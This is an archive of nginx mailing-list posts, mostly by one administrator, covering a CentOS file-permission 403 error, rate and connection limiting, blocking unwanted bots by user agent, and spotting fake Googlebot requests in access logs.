> > error_log /var/log/nginx/error.log;
> > pid /run/nginx.pid;
> > 
> > events {
> >worker_connections 1024;
> > }
> > 
> > http {
> >log_format  main  '$remote_addr - $remote_user [$time_local]
> > "$request" ' '$status $body_bytes_sent "$http_referer" '
> >  '"$http_user_agent" "$http_x_forwarded_for"';
> > 
> >access_log  /var/log/nginx/access.log  main;
> > 
> >sendfileon;
> >tcp_nopush  on;
> >tcp_nodelay on;
> >keepalive_timeout   65;
> >types_hash_max_size 2048;
> > 
> >include /etc/nginx/mime.types;
> >default_typeapplication/octet-stream;
> > 
> > server {
> >listen 80;
> >server_name mydomain.com www.mydomain.com;
> > 
> >return 301 https://$host$request_uri;
> > }
> > 
> >server {
> >listen   443 ssl  http2;
> >server_name  mydomain.com www.mydomain.com;
> >ssl_dhparam /etc/ssl/certs/dhparam.pem;
> >root /usr/share/nginx/html/mydomain.com/public_html;
> > 
> > ssl_certificate /etc/letsencrypt/live/mydomain.com/fullchain.pem; #
> > managed by Certbot
> > ssl_certificate_key /etc/letsencrypt/live/mydomain.com/privkey.pem;
> > # managed by Certbot ssl_ciphers HIGH:!aNULL:!MD5;
> > ssl_prefer_server_ciphers on;
> > 
> >location / {
> >root   /usr/share/nginx/html/mydomain.com/public_html;
> >index  index.html index.htm;
> >}
> > #
> >error_page 404 /404.html;
> >location = /40x.html {
> >}
> > #
> >error_page 500 502 503 504 /50x.html;
> >location = /50x.html {
> >}
> >}
> > 
> > }
> > 
> > I have firefox set up with no cache and do not save history.
> > -
> > access log:
> > 
> > mypi - - [20/Dec/2017:07:46:44 +] "GET /index.html HTTP/2.0"
> > 403 169 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
> > Firefox/52.0" "-"
> > 
> > myip - - [20/Dec/2017:07:48:44 +] "GET /index.html
> > HTTP/2.0" 403 169 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)
> > Gecko/20100101 Firefox/52.0" "-"
> > ---
> > error log:
> > 
> > 2017/12/20 07:46:44 [error] 10146#0: *48 open()
> > "/usr/share/nginx/html/mydomain.com/public_html/index.html" failed
> > (13: Permission denied), client: myip, server: mydomain.com,
> > request: "GET /index.html HTTP/2.0", host: "mydomain.com"
> > 2017/12/20 07:48:44 [error] 10146#0: *48 open()
> > "/usr/share/nginx/html/mydomain.com/public_html/index.html" failed
> > (13: Permission denied), client: myip, server: mydomain.com,
> > request: "GET /index.html HTTP/2.0", host: "mydomain.com"
> > 
> > 
> > Directory permissions:
> > For now, I made eveything 755 with ownership nginx:nginx I did chmod
> > and chown with the -R option
> > 
> > /etc/nginx:
> > drwxr-xr-x.  4 nginx nginx4096 Dec 20 07:39 nginx
> > 
> > /usr/share/nginx:
> > drwxr-xr-x.   4 nginx nginx33 Dec 15 08:47 nginx
> > 
> > /var/log:
> > drwx--. 2 nginx  nginx409

Centos 7 file permission problem

2017-12-20 Thread li...@lazygranch.com
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
have the firewalls set up properly since I can see my browser requests
in the access and error log. That said, I have file permission problem. 

nginx 1.12.2
Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 
x86_64 x86_64 x86_64 GNU/Linux
 

nginx.conf (with comments removed for brevity and my domain name remove
because google)
---
user nginx;
worker_processes auto;
error_log /var/log/nginx/error.log;
pid /run/nginx.pid;

events {
worker_connections 1024;
}

http {
log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
  '$status $body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';

access_log  /var/log/nginx/access.log  main;

sendfileon;
tcp_nopush  on;
tcp_nodelay on;
keepalive_timeout   65;
types_hash_max_size 2048;

include /etc/nginx/mime.types;
default_typeapplication/octet-stream;

server {
listen 80;
server_name mydomain.com www.mydomain.com;

return 301 https://$host$request_uri;
}

server {
listen   443 ssl  http2;
server_name  mydomain.com www.mydomain.com;
ssl_dhparam /etc/ssl/certs/dhparam.pem;
root /usr/share/nginx/html/mydomain.com/public_html;

ssl_certificate /etc/letsencrypt/live/mydomain.com/fullchain.pem; # managed by 
Certbot
ssl_certificate_key /etc/letsencrypt/live/mydomain.com/privkey.pem; # managed 
by Certbot
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;

location / {
root   /usr/share/nginx/html/mydomain.com/public_html;
index  index.html index.htm;
}
#
error_page 404 /404.html;
location = /40x.html {
}
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}

}

I have firefox set up with no cache and do not save history.
-
access log:

mypi - - [20/Dec/2017:07:46:44 +] "GET /index.html HTTP/2.0" 403 169
"-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0" "-"

myip - - [20/Dec/2017:07:48:44 +] "GET /index.html
HTTP/2.0" 403 169 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0" "-"
---
error log:

2017/12/20 07:46:44 [error] 10146#0: *48 open() 
"/usr/share/nginx/html/mydomain.com/public_html/index.html" failed (13: 
Permission denied), client: myip, server: mydomain.com, request: "GET 
/index.html HTTP/2.0", host: "mydomain.com"
2017/12/20 07:48:44 [error] 10146#0: *48 open() 
"/usr/share/nginx/html/mydomain.com/public_html/index.html" failed (13: 
Permission denied), client: myip, server: mydomain.com, request: "GET 
/index.html HTTP/2.0", host: "mydomain.com"


Directory permissions:
For now, I made eveything 755 with ownership nginx:nginx I did chmod
and chown with the -R option

/etc/nginx:
drwxr-xr-x.  4 nginx nginx4096 Dec 20 07:39 nginx

/usr/share/nginx:
drwxr-xr-x.   4 nginx nginx33 Dec 15 08:47 nginx

/var/log:
drwx--. 2 nginx  nginx4096 Dec 20 07:51 nginx
--
systemctl status nginx
● nginx.service - The nginx HTTP and reverse proxy server
   Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; vendor 
preset: disabled)
   Active: active (running) since Wed 2017-12-20 04:21:37 UTC; 3h 37min ago
  Process: 10145 ExecReload=/bin/kill -s HUP $MAINPID (code=exited, 
status=0/SUCCESS)
 Main PID: 9620 (nginx)
   CGroup: /system.slice/nginx.service
   ├─ 9620 nginx: master process /usr/sbin/nginx
   └─10146 nginx: worker process


Dec 20 07:18:33 servername systemd[1]: Reloaded The nginx HTTP and reverse 
proxy server.
--

ps aux | grep nginx
root  9620  0.0  0.3  71504  3848 ?Ss   04:21   0:00 nginx: master 
process /usr/sbin/nginx
nginx10146  0.0  0.4  72004  4216 ?S07:18   0:00 nginx: worker 
process
root 10235  0.0  0.0 112660   952 pts/1S+   08:01   0:00 grep ngin

---
firewall-cmd --zone=public --list-all
public (active)
  target: default
  icmp-block-inversion: no
  interfaces: eth0
  sources: 
  services: ssh dhcpv6-client http https
  ports: 
  protocols: 
  masquerade: no
  forward-ports: 
  source-ports: 
  icmp-blocks: 
  rich rules:
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Re: How to control the total requests in Ngnix

2017-11-30 Thread li...@lazygranch.com
Here is a log of real life IP limiting with a 30 connection limit:
86.184.152.14 British Telecommunications PLC
8.37.235.199 Level 3 Communications Inc.
130.76.186.14 The Boeing Company

security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40 
86.184.152.14 58714 -> myip 80, 34 too many entries
security.6.bz2:Nov 29 16:01:31 theranch kernel: ipfw: 5005 drop session type 40 
8.37.235.199 10363 -> myip 80, 42 too many entries
above repeated twice
security.8.bz2:Nov 29 06:39:15 theranch kernel: ipfw: 5005 drop session type 40 
130.76.186.14 34056 -> myip 80, 31 too many entries
above repeated 18 times

I have an Alexa rating around 960,000. Hey, at least I made to the top one 
million websites. But my point is even with a limit of 30, I'm kicking out 
readers. 

Look at the nature of the IPs. British Telecom is one of those huge ISPs where 
I guess different users are sharing the same IP. (Not sure.) Level 3 is the 
provider at many Starbucks, besides being a significant traffic carrier. Boeing 
has decent IP space, but maybe only a few IPs per facility. Who knows.

My point is if you set the limit at two, that is way too low. 

The only real way to protect from DDOS is to use a commercial reverse proxy. I 
don't think limiting connection in Nginx (or in the firewall) will solve a real 
attack. It will probably stop some kid in his parents basement. But today you 
can rent DDOS attacks on the dark web. 

If you really want to improve performance of your server, do severe IP 
filtering at the firewall. Limit the number of search engines that can read 
your site. Block major hosting companies and virtual private servers. There are 
no eyeballs there. Just VPNs (who can drop the VPN if they really want to read 
your site) and hackers. Easily half the internet traffic is bots.

Per some discussions on this list, it is best not to block using nginx, but 
rather use the firewall. Nginx parses the http request even if blocking the IP, 
so the CPU load isn't insignificant. As an alternative, you can use a 
reputation based blocking list. (I don't use one on web servers, just on email 
servers.)

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Response code 400 rather than 404

2017-07-17 Thread li...@lazygranch.com
I'm curious why this request got a 400 response rather than a 404. 

400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm 
HTTP/1.1" 173 "-" "-" "-"

log_format  main  '$status $remote_addr - $remote_user [$time_local] "$request" 
'
  '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: FreeBSD Clean Install nginx.pid Permissions Errors

2017-07-13 Thread li...@lazygranch.com
On Thu, 13 Jul 2017 23:46:12 +0100
Francis Daly  wrote:

> On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote:
> 
> Hi there,
> 
> > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t  
> 
> If you were running this command as "root", would that prompt say
> "root@neb" and end with a # ?
> 
> > nginx: the configuration file /usr/local/etc/nginx/nginx.conf
> > syntax is ok nginx: [emerg] open() "/var/run/nginx.pid" failed (13:
> > Permission denied)  
> 
> That might relate to permissions on /, /var, or /var/run, instead of
> on /var/run/nginx.pid.
> 
> But still: from what you've shown, there is no indication that user
> "rich" has the necessary permissions.
> 
> Good luck with it,
> 
> 
>From FreeBSD 11.0
f
/var
drwxr-xr-x  28 root  wheel  512 Jul 12 08:00 var

/var/run
drwxr-xr-x  10 root wheel 1024 Jul 13 03:01 run

/usr/local/www
drwxr-xr-x   5 root  wheel   512 Jun 18 04:13 www

Contents of /usr/local/www
drwxr-xr-x  3 root  wheel  512 Jun 10 00:19 .well-known
drwxr-xr-x  2 root  www512 Jun 12 01:16 acme
lrwxr-xr-x  1 root  wheel   25 Jun 18 04:13 nginx
-> /usr/local/www/nginx-dist dr-xr-xr-x  5 root  wheel  512 Jun 18
04:13 nginx-dist

Contents of /usr/local/www/nginx-dist/
-rw-r--r--  1 root  wheel  537 Jun 18 04:12 50x.html
-rw-r--r--  1 root  wheel1 Jun 18 04:12
EXAMPLE_DIRECTORY-DONT_ADD_OR_TOUCH_ANYTHING -rw-r--r--  1 root  wheel
612 Jun 18 04:12 index.html drwxr-xr-x  2 root  wheel  512 Jun  9 07:00


However the nginx process is owned by www:
 823 www   1  200 28552K  7060K kqread   0:01   0.00% nginx





/var/run/ngin.pid
-rw-r--r--  1 root  wheel   4 Jul 12 08:00 nginx.pid
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: block google app

2017-06-21 Thread li...@lazygranch.com
I'm sending 403 responses now, so I screwed up by mistaking the fields
in the logs. I'm going back to lurking mode again with my tail
shamefully between my legs.  

This code in the image location section will block the google app:

if ($http_user_agent ~* (com.google.GoogleMobile)) {
   return 403;
 }
-

403 107.2.5.162 - - [21/Jun/2017:07:21:08 +] "GET /images/photo.jpg 
HTTP/1.1" 140 "-" "com.google.GoogleMobile/28.0.0 iPad/10.3.2 hw/iPad6_7" "-"



___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: block google app

2017-06-21 Thread li...@lazygranch.com
Actually I think I was mistaken and the field is the user agent. I will
change the variable and see what happens. I did some experiments to
show the pattern match works.

On Tue, 20 Jun 2017 20:56:46 -0700
li...@lazygranch.com wrote:

> I want to block by referrer. I provided a more "normal" record so
> that the user agent and referrer location was obvious by context. 
> 
> My problem is I'm not creating the match expression correctly. I've
> tried spaces, parens. I haven't tried quotes. ‎ 
> 
>   Original Message  
> From: Robert Paprocki
> Sent: Tuesday, June 20, 2017 6:47 PM
> To: nginx@nginx.org
> Reply To: nginx@nginx.org
> Subject: Re: block google app
> 
> Well what is your log format then? We can't possibly help you if we
> don't have the necessary info ;)
> 
> Do you want to block based on http referer? Or user agent string? Or
> something else entirely? The config snippet you posted indicates you
> are trying to block by referer. If you want to block a request based
> on the user agent string, you need to use the variable I noted
> ($http_user_agent). 
> 
> Sent from my iPhone
> 
> > On Jun 20, 2017, at 18:35, "li...@lazygranch.com"
> > <li...@lazygranch.com> wrote:
> > 
> > I think the ipad is the useragent. I wiped out that access.log, but
> > here is a fresh one showing a browser (user agent) in the proper
> > field.
> > 
> > 200 76.20.227.211 - - [21/Jun/2017:00:48:45 +]
> > "GET /images/photo.jpg HTTP/1.1" 91223
> > "http://www.mydomain.com/page.html; "Mozilla/5.0 (Linux; Android
> > 6.0.1; SM-T350 B uild/MMB29M) AppleWebKit/537.36 (KHTML, like
> > Gecko) Chrome/58.0.3029.83 Safari/537.36" "-"
> > 
> > I sanitize these a bit because I don't like this stuff showing up in
> > google searches, but the basic format is the same. I use a custom
> > log file format. 
> > 
> > 
> > On Tue, 20 Jun 2017 17:49:14 -0700
> > Robert Paprocki <rpapro...@fearnothingproductions.net> wrote:
> > 
> >> Do you mean $http_user_agent?
> >> 
> >>> On Jun 20, 2017, at 17:36, "li...@lazygranch.com"
> >>> <li...@lazygranch.com> wrote:
> >>> 
> >>> I would like to block the google app from directly downloading
> >>> images. 
> >>> 
> >>> access.log:
> >>> 
> >>> 200 186.155.157.9 - - [20/Jun/2017:00:35:47 +]
> >>> "GET /images/photo.jpg HTTP/1.1" 334052 "-"
> >>> "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"
> >>> 
> >>> 
> >>> My nginx code in the images location:
> >>> 
> >>> if ($http_referer ~* (com.google.GoogleMobile)) {
> >>> return 403;
> >>> }
> >>> 
> >>> So what I am doing wrong?
> >>> ___
> >>> nginx mailing list
> >>> nginx@nginx.org
> >>> http://mailman.nginx.org/mailman/listinfo/nginx
> >> ___
> >> nginx mailing list
> >> nginx@nginx.org
> >> http://mailman.nginx.org/mailman/listinfo/nginx
> > 
> > ___
> > nginx mailing list
> > nginx@nginx.org
> > http://mailman.nginx.org/mailman/listinfo/nginx
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Re: block google app

2017-06-20 Thread li...@lazygranch.com
I think the ipad is the useragent. I wiped out that access.log, but
here is a fresh one showing a browser (user agent) in the proper field.

200 76.20.227.211 - - [21/Jun/2017:00:48:45 +] "GET /images/photo.jpg 
HTTP/1.1" 91223 "http://www.mydomain.com/page.html; "Mozilla/5.0 (Linux; 
Android 6.0.1; SM-T350 B
uild/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 
Safari/537.36" "-"

I sanitize these a bit because I don't like this stuff showing up in
google searches, but the basic format is the same. I use a custom log
file format. 


On Tue, 20 Jun 2017 17:49:14 -0700
Robert Paprocki <rpapro...@fearnothingproductions.net> wrote:

> Do you mean $http_user_agent?
> 
> > On Jun 20, 2017, at 17:36, "li...@lazygranch.com"
> > <li...@lazygranch.com> wrote:
> > 
> > I would like to block the google app from directly downloading
> > images. 
> > 
> > access.log:
> > 
> > 200 186.155.157.9 - - [20/Jun/2017:00:35:47 +]
> > "GET /images/photo.jpg HTTP/1.1" 334052 "-"
> > "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"
> > 
> > 
> > My nginx code in the images location:
> > 
> > if ($http_referer ~* (com.google.GoogleMobile)) {
> >return 403;
> >}
> > 
> > So what I am doing wrong?
> > ___
> > nginx mailing list
> > nginx@nginx.org
> > http://mailman.nginx.org/mailman/listinfo/nginx  
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


block google app

2017-06-20 Thread li...@lazygranch.com
I would like to block the google app from directly downloading images. 

access.log:

200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg 
HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"


My nginx code in the images location:

if ($http_referer ~* (com.google.GoogleMobile)) {
return 403;
}

So what I am doing wrong?
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: WordPress pingback mitigation

2017-05-21 Thread li...@lazygranch.com
Here is the map. I truncated my bad agent list, but will get you
started. I used the user agent changer in Chromium to make sure it
worked. -
map $http_user_agent $badagent {
default0;
~*WordPress1;
~*kscan1;
~*ache 1;
}

if ($badagent) {
return 444;
}
-

Of course there is always the problem of "scope", that is where to put
this. I have the map after the http {. I assume you have gzip enabled,
so my map starts after the "gzip on;"

The "if" statement is in the server block. I'm assuming you have the
line that stops hotlinking. I put it after that line.

Generically the hotlink blocker line looks like:
  if ($host !~ ^(mydomain.org|www.mydomain.org)$ ) {
 return 444;
  }




On Sun, 21 May 2017 08:14:52 +1000
Alex Samad  wrote:

> Hi
> 
> can you give an example of using a map instead of the if statement ?
> 
> Thanks
> 
> On 21 May 2017 at 02:35, c0nw0nk  wrote:
> 
> > gariac Wrote:
> > ---  
> > > I had run Naxsi with Doxi. Trouble is when it cause problems, it
> > > was really hard to figure out what rule was the problem. I
> > > suppose if you knew what each rule did, Naxsi would be fine.
> > >
> > > That said, my websites are so unsophisticated that it is far
> > > easier for me just to use maps.
> > >
> > > Case in point. When all this adobe struts hacking started, I
> > > noticed lots of 404s with the word "action" in the url request. I
> > > just added "action" to the map map and 444 them.
> > >
> > > If you have an url containing any word used in SQL, Naxsi/Doxi
> > > goes in blocking mode. I recall it was flagging on the word
> > > "update". I had a updates.html and Nasxi/Doxi was having a fit.
> > >
> > > In the end, it was far easier just to use maps. Other than a few
> > > modern constructs like "object-fit contain"‎, my sites have a
> > > 1990s look. Keeping things simple reduces the attack surface.
> > >
> > > I think even with Naxsi, you would need to set up a map to block
> > > bad referrers. I'm amazed at the nasty websites that link to me
> > > for no apparent reason. Case in point, I had a referral from the
> > > al Aqsa Martyrs Brigade. ‎ Terrorists! And numerous porn sites,
> > > all irrelevant. So Naxsi alone isn't sufficient.
> > >
> > >   Original Message
> > > From: c0nw0nk
> > > Sent: Saturday, May 20, 2017 3:36 AM
> > > To: nginx@nginx.org
> > > Reply To: nginx@nginx.org
> > > Subject: Re: WordPress pingback mitigation
> > >
> > > I take it you don't use a WAF of any kind i also think you should
> > > add it to
> > > a MAP at least instead of using IF.
> > >
> > > The WAF I use for these same rules is found here.
> > >
> > > https://github.com/nbs-system/naxsi
> > >
> > > The rules for wordpress and other content management systems are
> > > found here.
> > >
> > > http://spike.nginx-goodies.com/rules/ ( a downloadable list they
> > > use https://bitbucket.org/lazy_dogtown/doxi-rules )
> > >
> > >
> > > Naxsi is the best soloution I have found against problems like
> > > this especialy with their XSS and SQL extensions enabled.
> > >
> > > LibInjectionXss;
> > > CheckRule "$LIBINJECTION_XSS >= 8" BLOCK;
> > > LibInjectionSql;
> > > CheckRule "$LIBINJECTION_SQL >= 8" BLOCK;
> > >
> > >
> > > Blocks allot of zero day exploits and unknown exploits /
> > > penetration testing
> > > techniques.
> > >
> > > If you want to protect your sites it is definitely worth the look
> > > and use.
> > >
> > > Posted at Nginx Forum:
> > > https://forum.nginx.org/read.php?2,274339,274341#msg-274341
> > >
> > > ___
> > > nginx mailing list
> > > nginx@nginx.org
> > > http://mailman.nginx.org/mailman/listinfo/nginx
> > > ___
> > > nginx mailing list
> > > nginx@nginx.org
> > > http://mailman.nginx.org/mailman/listinfo/nginx  
> >
> >
> > It is not actually that hard to read the rules when you understand
> > it.
> >
> > The error.log file tells you.
> >
> > As I helped someone before read and understand their error log
> > output to tell them what naxsi was telling them so they could learn
> > understand and identify what rule is the culprit to their problem.
> >
> > Here is the prime example :
> > https://github.com/nbs-system/naxsi/issues/351#issuecomment-281710763
> >
> > If you read that and see their error.log output from naxsi and view
> > the log it shows you in the log if it was for example "ARGS" or
> > "HEAD" or "POST" etc
> > and the rule ID number responsible. So you can either null it out
> > or create a whitelist for that method.
> >
> > I am not trying to shove it down your neck or anything like that
> > just 

hacker proxy attempt

2017-04-29 Thread li...@lazygranch.com
A bit OT, but can a guru verify I rejected all these proxy attempts.
I'm 99.9% sure, but I'd hate to allow some spammer or worse to route
through my server. The only edit I made is when they ran my IP address
though a forum spam checker. (I assume google indexes pastebin.)

https://pastebin.com/VCg28AZf

Pastebin made me captcha because they thought I was a spammer. ;-)


___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Is this a valid request?

2016-11-14 Thread li...@lazygranch.com
I keep my nginx server set up dumb. (Don't need anything fancy at the
moment). Is this request below possibly valid? I flag anything with a
question mark in it as hacking, but maybe IOS makes some requests that
some websites will process, and others would just ignore after the
question mark. 

444 72.49.13.171 - - [14/Nov/2016:06:55:52 +] "GET 
/ttr.htm?sa=X=2=0ahUKEwiB7Nyj1afQAhWJZCYKHWLGAW8Q_B0IETAA HTTP/1.1" 0 
"-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) 
AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/20.3.136880903 Mobile/14B100 
Safari/600.1.4" "-"

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Unexptected return code

2016-11-08 Thread li...@lazygranch.com
I only serve static pages, hence I have this in my conf file:

---
## Only allow these request methods ##
 if ($request_method !~ ^(GET|HEAD)$ ) {
 return 444;
 }

Shouldn't the return code be 444 instead of 400?

400 111.91.67.118 - - [09/Nov/2016:05:18:38 +] "CONNECT 
search.yahoo.com:443 HTTP/1.1" 173 "-" "-" "-"
---

This is more of a curiosity rather than an issue. 

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Hacker log

2016-10-22 Thread li...@lazygranch.com
On Sat, 22 Oct 2016 17:40:56 -0400
"itpp2012"  wrote:

> The idea is nice but pointless, if you maintain this list over 6
> months you most likely will end up blocking just about everyone.
> 
> Stick to common sense with your config, lock down nginx and the
> backends, define proper flood and overflow settings for nginx to deal
> with, anything beyond the scope of nginx should be dealt with by your
> ISP perimeter systems.
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,270485,270486#msg-270486
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

I've been doing this for more than six months. Clearly I haven't
blocked everyone. ;-)

These requests would just go to 404 if I didn't trap them. I rather
save 404 for real missing links.

My attitude regarding hacking is if it comes from a place without
eyeballs (hosting, colo, etc.), enjoy your lifetime ban. This keeps the
logs cleaner. Dumb hacking attempts like that clown could be some real
attack in the future, so better to block them. 

At the very least, you could block all well known cloud services. AWS
for example, but not from email ports. 

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Hacker log

2016-10-22 Thread li...@lazygranch.com
http://pastebin.com/7W0uDrLa

If you need an extensive list of hacker requests (over 200), I put this
log entry on pastebin. As mentioned at the top of the pastebin, the
hacker used my IP address directly rather than my doman name. 

I have a "map" that detects typical hacker activity. Perhaps in my "map"
of triggers, I should look for bypassing the domain name, that is
requests directly to my IP address. There is nothing particularly evil
in using my IP address rather than domain name, but would any real user
ever use my IP address? Kind of doubtful.

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: fake googlebots

2016-09-28 Thread li...@lazygranch.com
http://pastebin.com/tZZg3RbA/?e=1

This is the access.log file data relevant to that fake googlebot. It
starts with a fake googlebot entry, then goes downhill from there. I
rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST
went to 444 directly.

I replaced the domain with a fake one.

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


fake googlebots

2016-09-25 Thread li...@lazygranch.com
I got a spoofed googlebot hit. It was easy to detect since there were
probably a hundred requests that triggered my hacker detection map
scheme. Only two requests received a 200 return and both were harmless.

200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

For the fake googlebot:
# host 118.193.176.53
Host 53.176.193.118.in-addr.arpa not found: 3(NXDOMAIN)

For a real googlebot:
# host 66.249.69.184
184.69.249.66.in-addr.arpa domain name pointer 
crawl-66-249-69-184.googlebot.com.

IP2location shows it is a Chinese ISP:
3(NXDOMAIN)http://www.ip2location.com/118.193.176.53

Nginx has a reverse DNS module:
https://github.com/flant/nginx-http-rdns
I see it has a 10.1 issue:
https://github.com/flant/nginx-http-rdns/issues/8

Presuming this bug gets fixed, does anyone have code to verify
googlebots? Or some other method?

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: limit-req and greedy UAs

2016-09-13 Thread li...@lazygranch.com
Seeing that nobody beat me to it, I did the download manager
experiment. There are plugins for Chromium to do multiple connections,
but I figured a stand alone program was safer. (No use adding strange
software to a reasonable secure browser.)

My linux disty has prozilla in the repo. In true linux tradition, the
actual executable is not prozilla but rather proz.

I requested 8 connections, but I could never get more than 5 running at
a time. I allow 10 in the setup, so something else is the limiting
factor. Be that as it may, I achieved multiple connections, which is
all that is required to test the rate limiting.

Using proz, I achieved about 4Mbps when all connections were running.
Just downloading from the browser, the network manager reports rates of
500k to 600k Bytes/second.

Conclusion: nginx rate limiting is not "gamed" by using multiple
connections to download ONE file using a file manager.

The next experiment is to download two different files at 4 connections
each with the file manager. I got 1.1mbps and 1.4mbps, which when summed
together is actually less than the rate limit.

Conclusion: nginx rate limiting still works with 8 connections.

Someone else should try to duplicate this in the event it has something
to do with my setup.



On Mon, 12 Sep 2016 15:30:01 -0700
li...@lazygranch.com wrote:

> Most of the chatter on the interwebs believes that the rate limit is
> per connection, so if some IP opens up multiple connections, they get
> more bandwidth. 
> 
> It shouldn't be that hard to just test this by installing a manager
> and seeing what happens. I will give this a try tonight, but
> hopefully someone will beat me to it.
> 
> Relevant post follows:
> ‎---
> On 17 February 2014 10:02, Bozhidara Marinchovska
>  wrote:‎
> > My question is what may be the reason when downloading the example
> > file with download manager not to match limit_rate directive
> 
> "Download managers" open multiple connections and grab different byte
> ranges of the same file across those connections. Nginx's limit_rate
> function limits the data transfer rate of a single connection.‎
> 
> ‎
> http://mailman.nginx.org/pipermail/nginx/2014-February/042337.html
> ---
> ‎
>   Original Message  
> From: Richard Stanway
> Sent: Monday, September 12, 2016 2:39 PM
> To: nginx@nginx.org
> Reply To: nginx@nginx.org
> Subject: Re: limit-req and greedy UAs
> 
> limit_req works with multiple connections, it is usually configured
> per IP using $binary_remote_addr. See
> http://nginx.org/en/docs/http/ngx_http_limit_req_module.html#limit_req_zone
> - you can use variables to set the key to whatever you like.
> 
> limit_req generally helps protect eg your backend against request
> floods from a single IP and any amount of connections. limit_conn
> protects against excessive connections tying up resources on the
> webserver itself.
> 
> On Mon, Sep 12, 2016 at 10:23 PM, Grant <emailgr...@gmail.com> wrote:
> > ‎https://www.nginx.com/blog/tuning-nginx/
> >
> > ‎I have far more faith in this write up regarding tuning than the
> > anti-ddos, though both have similarities.
> >
> > My interpretation is the user bandwidth is connections times rate.
> > But you can't limit the connection to one because (again my
> > interpretation) there can be multiple users behind one IP. Think of
> > a university reading your website. Thus I am more comfortable
> > limiting bandwidth than I am limiting the number of
> > connections. ‎The 512k rate limit is fine. I wouldn't go any higher.
> 
> 
> If I understand correctly, limit_req only works if the same connection
> is used for each request.  My goal with limit_conn and limit_conn_zone
> would be to prevent someone from circumventing limit_req by opening a
> new connection for each request.  Given that, why would my
> limit_conn/limit_conn_zone config be any different from my
> limit_req/limit_req_zone config?
> 
> - Grant
> 
> 
> > Should I basically duplicate my limit_req and limit_req_zone
> > directives into limit_conn and limit_conn_zone? In what sort of
> > situation would someone not do that?
> >
> > - Grant
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
> 
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Re: Problems with custom log file format

2016-08-23 Thread li...@lazygranch.com
Link goes to conf file
https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0


On Tue, 23 Aug 2016 20:51:55 +0300
"Reinis Rozitis"  wrote:

> > Configuration file included in the post. I already checked it.
> 
> You have shown only few excerpts (like there might be other
> access_log directives in other parts included config files (easily
> missed when doing include path/*.conf) etc).
> 
> For example if you can reproduce the issue with such config (I
> couldn't) there might be a bug in the software:
> 
> events {}
> http {
> log_format main '$status $remote_addr - $remote_user
> [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> '"$http_user_agent" "$http_x_forwarded_for"';
> access_log  logs/access.log main;
> server {}
> }
> 
> rr 
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
